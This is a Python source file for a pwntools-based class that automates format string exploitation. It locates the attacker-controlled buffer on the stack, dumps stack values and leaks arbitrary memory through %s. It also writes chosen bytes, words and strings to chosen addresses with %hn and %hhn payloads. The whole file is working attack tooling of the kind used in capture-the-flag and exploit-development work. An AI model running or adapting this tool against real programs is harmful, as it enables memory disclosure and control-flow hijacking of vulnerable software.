from pwn import *

class FormatString:
    """Initialize a FormatString class

    Parameters
    ----------
    exec_fmt : callable
        Callable (function, lambda, bound method, functools.partial, ...) that takes in one
        input, a string, and returns the output of the format string vulnerability on it.
    arch : str, optional
        String representing what architecture this binary is.
    bits : int, optional
        How many bits is this binary? Commonly 32 (Default) or 64.
    endian : str, optional
        Is this binary 'little' (Default) or 'big' endian?
    elf : pwnlib.elf.elf.ELF, optional
        pwnlib elf instantiation of this binary. If specified, arch, bits and endian are taken from it.
    max_explore : int, optional
        How deep down the stack should we explore? Larger numbers may take more time. Default is 64.
    bad_chars : str, optional
        What characters should we avoid when exploiting this? Defaults to newline character.
    index : int, optional
        If you already know the index for this vulnerability, you can specify it here.
    pad : int, optional
        If you already know the padding needed, you can specify it here.
    written : int, optional
        If you already know how many bytes have been written in the format string, you can specify it here.
    explore_stack : bool, optional
        Should we auto-explore the stack? Defaults to True.


    Returns
    -------
    fmtStr : FormatString.FormatString


    Attributes
    ----------
    arch : str
        String representation of the architecture, such as i386 and amd64
    bits : int
        Integer representation of how many bits are in this architecture
    endian : str
        String representation of what endianness this binary is: little or big
    elf : pwnlib.elf.elf.ELF
        pwnlib ELF instantiation representing this binary
    exec_fmt : callable
        Callable to be called when we need to evaluate a format string
    max_explore : int
        How deep down the stack should we explore?
    bad_chars : str
        What characters should we avoid when exploiting this?
    index : int or None
        Positional argument index (``%N$``) at which our controlled buffer starts, if known.
    pad : int or None
        Number of filler characters placed before our buffer so it starts on a word boundary.
    already_written : int or None
        Number of characters printed before our input, if known.
    stack : list of int
        Values seen at each ``%N$p`` position during stack exploration; entry 0 is a placeholder.

    """

    def __init__(self,exec_fmt,arch='i386',bits=32,endian='little',elf=None,max_explore=64,bad_chars="\n",
                 index=None,pad=None,written=None,explore_stack=True):

        # Accept any callable (plain function, bound method, functools.partial, object
        # with __call__); comparing against type(lambda) rejected all but plain functions.
        if not callable(exec_fmt):
            log.error("exec_fmt arg must be a callable function.")
            return

        self.arch = arch
        self.bits = bits
        self.endian = endian
        self.elf = elf
        self.exec_fmt = exec_fmt
        self.max_explore = max_explore
        self.bad_chars = bad_chars

        # Filler character used to word-align our buffer. Might want to change this sometime...
        self.padChar = "C"

        # Where is our controlled buffer? (None means "not known yet")
        self.pad = pad
        self.index = index
        self.already_written = written

        # Values recorded by _exploreStack. Position 0 is a placeholder so that
        # self.stack[i] holds what "%i$p" printed.
        self.stack = [0]

        # The ELF will override the other options
        if elf is not None:
            if not isinstance(elf, pwnlib.elf.elf.ELF):
                log.warning("ELF argument is wrong type. Expecting pwnlib.elf, got {0}. Ignoring for now.".format(type(elf)))
            else:
                self.arch = elf.arch
                self.bits = elf.bits
                self.endian = elf.endian

        # Memory leaker built on top of _leak (exposes helpers such as leak.s / leak.d)
        self.leak = memleak.MemLeak(self._leak)

        if self.index is not None:
            # Skip the index search since we have been given it; default the pad to 0.
            if self.pad is None:
                log.warning("Index specified but no pad specified. Defaulting to 0.")
                self.pad = 0
        else:
            # Try to determine where we are in the binary
            self._findIndex()

        if explore_stack:
            self._exploreStack()

    # ------------------------------------------------------------------ helpers

    @staticmethod
    def _isInteger(value):
        """Return True if value is an integer (int, or long on Python 2)."""
        import numbers
        return isinstance(value, numbers.Integral)

    @staticmethod
    def _intToBigEndianStr(i):
        """Return non-negative integer i as its shortest big-endian byte string.

        Zero becomes a single NUL character. Works on byte values directly, so Python 2
        longs (whose hex() carries an "L" suffix) are handled as well.

        Raises
        ------
        ValueError
            If i is negative.
        """
        if i < 0:
            raise ValueError("Cannot convert negative integer {0} to a byte string".format(i))
        chars = []
        while True:
            chars.append(chr(i & 0xff))
            i >>= 8
            if not i:
                break
        chars.reverse()
        return "".join(chars)

    @staticmethod
    def _extractBetweenGuards(out, guard):
        """Return the text between the first two occurrences of guard in out.

        Returns None if out is None or either guard is missing.
        """
        if out is None:
            return None
        start = out.find(guard)
        if start == -1:
            return None
        start += len(guard)
        end = out.find(guard, start)
        if end == -1:
            return None
        return out[start:end]

    def _stackPosition(self, value):
        """Return the ``%N$`` position where _exploreStack saw value, or None.

        Position 0 is skipped because it is only a placeholder, not a real argument.
        """
        try:
            return self.stack.index(value, 1)
        except ValueError:
            return None

    def _intToStr(self,i):
        """Convert a non-negative integer to its raw byte string in the binary's endianness."""
        s = self._intToBigEndianStr(i)

        # Reverse the order if we're little endian
        if self.endian == 'little':
            s = s[::-1]

        return s


    def _isPrintableString(self,s):
        """Check if the string we're given should be considered printable (empty counts as printable)."""
        return all(c in string.printable for c in s)


    def printStack(self,guessPointers=True):
        """Print out what we know about the stack layout in a table format.

        Each row shows a stack position, its value, and guesses: the value as a printable
        string, a matching ELF symbol, and (if guessPointers) the string it points to.

        Note: guessPointers may cause the binary to crash if it is guessed incorrectly,
        because it dereferences the value through ``self.leak``.
        """
        table = PrettyTable(["Index","Value","Guess"])
        table.align['Guess'] = 'l'

        # Pointer-guessing heuristic: group large, non-printable values by their first three
        # hex digits; values belonging to a well-populated group are treated as pointers.
        prefixes = sorted(hex(addr)[2:5] for addr in self.stack
                          if addr > 0x1000 and not self._isPrintableString(self._intToStr(addr)))
        stats = {key: len(list(group)) for key, group in groupby(prefixes)}

        # Reverse symbol table built once (keeps the first symbol seen for each address)
        symbol_for = {}
        if self.elf:
            for sym in self.elf.symbols:
                symbol_for.setdefault(self.elf.symbols[sym], sym)

        # Loop through the stack items creating table
        for i in range(1, len(self.stack)):
            val = self.stack[i]
            as_str = self._intToStr(val)
            guess = []

            # If the data in here is printable
            if self._isPrintableString(as_str):
                guess.append(repr(as_str))

            # If we have elf tools and this appears to be a known address
            if val in symbol_for:
                guess.append("Symbol: " + symbol_for[val])

            # If we think this might be a pointer
            if guessPointers and stats.get(hex(val)[2:5], 0) > 2:
                guess.append("Pointer --> " + repr(self.leak.s(val))[:64])

            table.add_row([i, hex(val), ', '.join(guess)])

        print(table)

    def _exploreStack(self):
        """Explore what pointers and data already exist on the stack.

        For each position i in 1..max_explore-1, print "%i$p" between two guards and append
        the parsed value to self.stack. "(nil)", empty output, or output in which the guards
        cannot be found is recorded as 0 so positions stay aligned.
        """
        word_size = self.bits // 8
        guard = "J" * word_size

        # Assuming 0 pad if we haven't found one yet...
        # TODO: Could create a heuristic find to get a better idea of the correct pad.
        prefix = self.padChar * (self.pad or 0)

        for i in range(1, self.max_explore):
            out = self.exec_fmt("{0}{1}%{2}$p{1}".format(prefix, guard, i))
            value = self._extractBetweenGuards(out, guard)
            if value is None:
                log.warning("Could not parse stack value at index {0}; recording 0.".format(i))
                value = ""
            if value == "" or "(nil)" in value:
                self.stack.append(0)
            else:
                self.stack.append(int(value, 16))

    def _findIndex(self):
        """Figure out where our input starts as well as other information automatically.

        The findIndex step automates the process of determining where our
        controlled input starts. It will iteratively shift inputs to the format
        string function until it finds the proper index and padding. It will
        then save that value in the class instance for future reference, along with
        the number of characters printed before our input (already_written).
        """
        print("Exploring format string vulnerability...")

        # How big should our search words be?
        word_size = self.bits // 8

        # Change our output type based on the size we're looking for
        if self.bits == 32:
            out_type = "x"
        elif self.bits == 64:
            out_type = "lx"
        else:
            log.error("Unknown bits variety {0}".format(self.bits))
            return None

        # TODO: Might wanna change this later to something less predictable.
        test_input = "A" * word_size
        hex_len = word_size * 2

        # %x prints the word as a number (most significant byte first), so on a
        # little-endian target our bytes appear in reverse order.
        printed_order = test_input[::-1] if self.endian == 'little' else test_input
        expected_hex = "".join("%02x" % ord(c) for c in printed_order)

        # Loop through up to the max exploration depth, trying every pad offset
        for index in range(1, self.max_explore):
            for pad in range(word_size):
                output = self.exec_fmt("{2}{0}%{3}$0{1}{4}".format(
                    test_input, hex_len, self.padChar * pad, index, out_type))
                if output is None or test_input not in output:
                    continue
                before, _, after = output.partition(test_input)

                # On the base print, record the number of bytes written before us
                if index == 1 and pad == 0:
                    self.already_written = len(before)

                # Check if we found it
                if after[:hex_len].lower() == expected_hex:
                    print("Found the offset to our input! Index = {0}, Pad = {1}".format(index,pad))
                    self.index = index
                    self.pad = pad
                    return None

        log.warning("Failed to find offset to our input! You will have reduced functionality.")
        return None

    def _leak(self,addr):
        """Given an addr, leak that memory as raw string.

        .. note::

            This is a base function. You probably don't want to call this directly. Instead, you should call methods of the ``leak`` method, such as ``leak.d(addr)``

        Parameters
        ----------
        addr : int
            Address to leak some bytes from

        Returns
        -------
        str or None
            Raw leak of bytes as a string starting from the given address ("\\x00" when
            nothing was printed), or None if the address cannot be leaked.

        """
        word_size = self.bits // 8

        # TODO: Randomize guard?
        guard = "J" * word_size
        pad = self.pad or 0

        # If we control an index, place the packed address in our buffer and %s it
        if self.index:
            packed = self._packPointer(addr)
            if packed is None or self._hasBadChar(packed):
                return None

            # TODO: "%NNN$s" assumes up to 3 index digits (6 chars), rounded up to whole words.
            spec_words = -(-6 // word_size)

            # Layout: pad | guard | spec | guard | address -> address is 2 + spec_words words past index
            real_index = self.index + 2 + spec_words
            spec = "%{0}$s".format(str(real_index).rjust(3, "0"))
            spec += "J" * (-len(spec) % word_size)  # Pad it out to a word length

            fmt = "{0}{1}{2}{1}{3}".format(self.padChar * pad, guard, spec, packed)

        # Otherwise see if this address is already sitting on the stack
        else:
            position = self._stackPosition(addr)
            if position is None:
                return None
            # The pointer is already on the stack, so no alignment is needed
            fmt = "{0}{1}%{2}$s{1}".format(self.padChar * pad, guard, position)

        leaked = self._extractBetweenGuards(self.exec_fmt(fmt), guard)

        # If the leaker failed to return anything usable, we won't be able to do any more
        if leaked is None:
            return None

        # Since we're printing strings, empty output means we hit a null byte
        return leaked if leaked else "\x00"

    def _hasBadChar(self,s):
        """Check input for bad characters.

        Given the bad_chars we initialized the class with, check the input variable to see if any exist in there.

        Parameters
        ----------
        s : int or str
            Input to be checked for bad characters. Integers (including Python 2 longs)
            are converted to their shortest big-endian byte string first; a Python 3
            ``bytes`` value is mapped byte-for-byte to characters.


        Returns
        -------
        bool
            True if input has bad characters, False otherwise
        """
        if self._isInteger(s):
            s = self._intToBigEndianStr(s)
        elif isinstance(s, bytes) and not isinstance(s, str):
            s = s.decode('latin-1')

        return any(bad_char in s for bad_char in self.bad_chars)

    def _packPointer(self,val):
        """Packs val as pointer relevant to the current binary.

        Parameters
        ----------
        val : int
            Pointer value as integer that should be packed appropriately to this binary.


        Returns
        -------
        str or None
            Integer packed as string relevant to this binary (i.e.: proper endianness),
            or None (after logging) if bits/endian are unsupported.

        """
        assert type(self.bits) is int
        assert type(self.endian) is str

        bits_str = {32: "I", 64: "Q"}.get(self.bits)
        if bits_str is None:
            log.error("Unknown bits value of {}".format(self.bits))
            return None

        endian_str = {"little": "<", "big": ">"}.get(self.endian)
        if endian_str is None:
            log.error("Unknown endian type {}".format(self.endian))
            return None

        return pack(endian_str + bits_str, val)

    def _valueToInt(self, val, size_name, n_bytes, struct_code):
        """Convert a str/int value destined for an n_bytes write into an integer.

        Strings must be exactly n_bytes long and are unpacked in the binary's endianness.
        Returns None (after logging) on a wrong-length string or an integer that does not fit.
        """
        if isinstance(val, str):
            if len(val) != n_bytes:
                log.error("Write {0} expects string of length {1}, got length {2}".format(size_name, n_bytes, len(val)))
                return None
            endian_dir = "<" if self.endian == "little" else ">"
            return unpack(endian_dir + struct_code, val)[0]

        max_val = (1 << (8 * n_bytes)) - 1
        if val > max_val:
            log.error("Input value is larger than {0} size ({1:#x})".format(size_name, max_val))
            return None
        return val


    def write_byte(self,addr,val):
        """write a single byte of data at addr

        Parameters
        ----------
        addr : int
            Address to write the byte to
        val : int or str
            Integer or string to write to address



        This call will attempt to write the value provided into the address
        provided. If value is a string, it will convert it to an integer first.
        Returns None.

        """

        # TODO: Update this to utilize existing stack pointers like write_n_words does

        assert isinstance(val, str) or self._isInteger(val)
        assert self._isInteger(addr)

        # Check for chars we don't like
        if self._hasBadChar(addr):
            return None

        # Same defaults write_n_words uses when the buffer location is unknown
        pad = self.pad or 0
        already_written = self.already_written or 0
        index = self.index or 1
        pointer_len = self.bits // 8

        # Change string to int
        if isinstance(val, str):
            if len(val) != 1:
                log.error("Write byte expects string of length 1, got length {0}".format(len(val)))
                return None
            val = ord(val)

        elif val > 0xff:
            log.error("Attempting to write more than one byte. Use different write call.")
            return None

        # Print out appropriate number of chars so the total printed count equals val
        count = val - pad - already_written
        if count < 0:
            log.error("Pad value is larger than print value. Pick a larger value to write.")
            return None
        spec = "%{0}c".format(count) if count > 0 else ""

        # "%NNN$hhn" has a fixed length because the index is zero-padded to 3 digits;
        # round the specifier up to pointer length so our pointer is word-aligned.
        spec_len = len(spec) + len("%000$hhn")
        pad_after = -spec_len % pointer_len
        pointer_index = index + (spec_len + pad_after) // pointer_len
        if pointer_index > 999:
            log.error("Argument index {0} does not fit in 3 digits.".format(pointer_index))
            return None

        packed = self._packPointer(addr)
        if packed is None:
            return None

        self.exec_fmt("{0}{1}%{2}$hhn{3}{4}".format(
            "J" * pad, spec, str(pointer_index).rjust(3, "0"), "J" * pad_after, packed))


    def write_word(self,addr,val):
        """write a word of data at addr

        Parameters
        ----------
        addr : int
            Address to write the word to
        val : int or str
            Integer or string to write to address



        This call will attempt to write the value provided into the address
        provided. If value is a string, it will convert it to an integer first.

        """
        assert isinstance(val, str) or self._isInteger(val)
        assert self._isInteger(addr)

        val = self._valueToInt(val, "word", 2, "H")
        if val is None:
            return None

        return self.write_n_words(addr,val,1)


    def write_n_words(self,addr,val,n):
        """Write value at addr, telling FormatString how many words you actually want to write

        Parameters
        ----------
        addr : int
            Address to write words to
        val : int
            Value to write at address
        n : int
            Number of words that this value represents


        This will attempt to write `n` words of `val` starting at address
        `addr`. Note that it will write in words and, for now, will not utilize
        byte writes. This is the core method that the other calls (aside from
        write_byte) use to actually write. Addresses already recorded on the stack
        are referenced in place; others are appended to the payload and must be free
        of bad characters. Returns None.

        """
        assert self._isInteger(val)
        assert self._isInteger(addr)
        assert self._isInteger(n)

        # Nothing to write; don't run the target for an empty payload
        if n <= 0:
            return None

        pointer_len = self.bits // 8

        # TODO: Assuming pad of 0. Need to implement heuristic to guess a better pad.
        pad = self.pad or 0
        already_written = self.already_written or 0

        # TODO: This is kinda #YOLO... Need to better handle the case where we're going into the blind from the get go..
        index = self.index or 1

        # One 16-bit write per word (lowest word at the lowest address), performed in
        # increasing value order because the printed-character counter only grows.
        writes = sorted(
            ({'val': (val >> (16 * i)) & 0xffff, 'addr': addr + 2 * i} for i in range(n)),
            key=lambda w: w['val'])

        # "%Nc" runs that bring the printed count up to each write's value
        counts = []
        printed = already_written + pad
        for write in writes:
            delta = write['val'] - printed
            if delta < 0:
                log.error("Ran into an impossible write apparently... :-/")
                return None
            counts.append("%{0}c".format(delta) if delta else "")
            printed = write['val']

        # Each "%NNN$hn" is 7 chars (indexes zero-padded to 3 digits), so the specifier
        # length is known before the indexes are; round it up to pointer length.
        spec_len = sum(len(c) for c in counts) + len(writes) * len("%000$hn")
        pad_after = -spec_len % pointer_len
        next_index = index + (spec_len + pad_after) // pointer_len

        # Reuse pointers already on the stack; otherwise append our own after the specifiers
        arg_indexes = []
        pointers = []
        for write in writes:
            position = self._stackPosition(write['addr'])
            if position is None:
                # This address goes into our payload, so it must be free of bad chars
                if self._hasBadChar(write['addr']):
                    return None
                packed = self._packPointer(write['addr'])
                if packed is None:
                    return None
                pointers.append(packed)
                position = next_index
                next_index += 1
            arg_indexes.append(position)

        if max(arg_indexes) > 999:
            log.error("Argument index {0} does not fit in 3 digits.".format(max(arg_indexes)))
            return None

        spec = "".join("{0}%{1}$hn".format(count, str(position).rjust(3, "0"))
                       for count, position in zip(counts, arg_indexes))

        # Raw pointer bytes are appended last, after all str.format calls, so bytes such
        # as "{" or "}" inside an address can never be interpreted as format fields.
        self.exec_fmt("J" * pad + spec + "J" * pad_after + "".join(pointers))


    def write_dword(self,addr,val):
        """write a double word of data at addr

        Parameters
        ----------
        addr : int
            Address to write the double word to
        val : int or str
            Integer or string to write to address



        This call will attempt to write the value provided into the address
        provided. If value is a string, it will convert it to an integer first.

        """
        assert isinstance(val, str) or self._isInteger(val)
        assert self._isInteger(addr)

        val = self._valueToInt(val, "dword", 4, "I")
        if val is None:
            return None

        return self.write_n_words(addr,val,2)

    def write_qword(self,addr,val):
        """write a quad word of data at addr

        Parameters
        ----------
        addr : int
            Address to write the quad word to
        val : int or str
            Integer or string to write to address



        This call will attempt to write the value provided into the address
        provided. If value is a string, it will convert it to an integer first.

        """
        assert isinstance(val, str) or self._isInteger(val)
        assert self._isInteger(addr)

        val = self._valueToInt(val, "qword", 8, "Q")
        if val is None:
            return None

        return self.write_n_words(addr,val,4)

    def write_string(self,addr,s):
        """Attempt to write s as a string at address addr

        Parameters
        ----------
        addr : int
            Address to start writing the string to
        s : str
            String to write to address



        This call will attempt to write the string provided into the address
        provided. It does this by turning the string into a large number and
        writing the large number, 16-bit word by word. Odd-length strings get a
        trailing NUL byte; an empty string writes nothing.

        """
        assert self._isInteger(addr)
        assert type(s) is str

        if not s:
            return None

        # Word writes cover two bytes each
        if len(s) % 2:
            s += "\x00"

        # Build the value so that word k (stored via %hn in native byte order at addr + 2k)
        # lays down s[2k] then s[2k+1] in memory.
        little = self.endian == 'little'
        val = 0
        for offset in range(0, len(s), 2):
            first, second = ord(s[offset]), ord(s[offset + 1])
            word = (first | (second << 8)) if little else ((first << 8) | second)
            val |= word << (8 * offset)

        return self.write_n_words(addr, val, len(s) // 2)

    def write_b(self,addr,val):
        """Wraps the ``write_byte`` call"""
        return self.write_byte(addr,val)

    def write_w(self,addr,val):
        """Wraps the ``write_word`` call"""
        return self.write_word(addr,val)

    def write_d(self,addr,val):
        """Wraps the ``write_dword`` call"""
        return self.write_dword(addr,val)

    def write_q(self,addr,val):
        """Wraps the ``write_qword`` call"""
        return self.write_qword(addr,val)

    def write_s(self,addr,s):
        """Wraps the ``write_string`` call"""
        return self.write_string(addr,s)

    def __getitem__(self,addr):
        """
        Get item is shorthand for leaking that memory location of the binary.
        """
        return self.leak(addr)
        

# Module-level names used by FormatString's methods. They are bound after the class
# body, which works because methods look these names up at call time, not at
# class-definition time.
import logging
# NOTE: rebinding `log` here replaces any `log` brought in by `from pwn import *` at the
# top of the file, so every log.* call in this module goes to this standard-library logger.
log = logging.getLogger('FormatString')
from binascii import unhexlify
# Likewise, this struct.pack/unpack (format string first) replaces any star-imported `pack`.
from struct import pack, unpack
from prettytable import PrettyTable
import string
from itertools import groupby
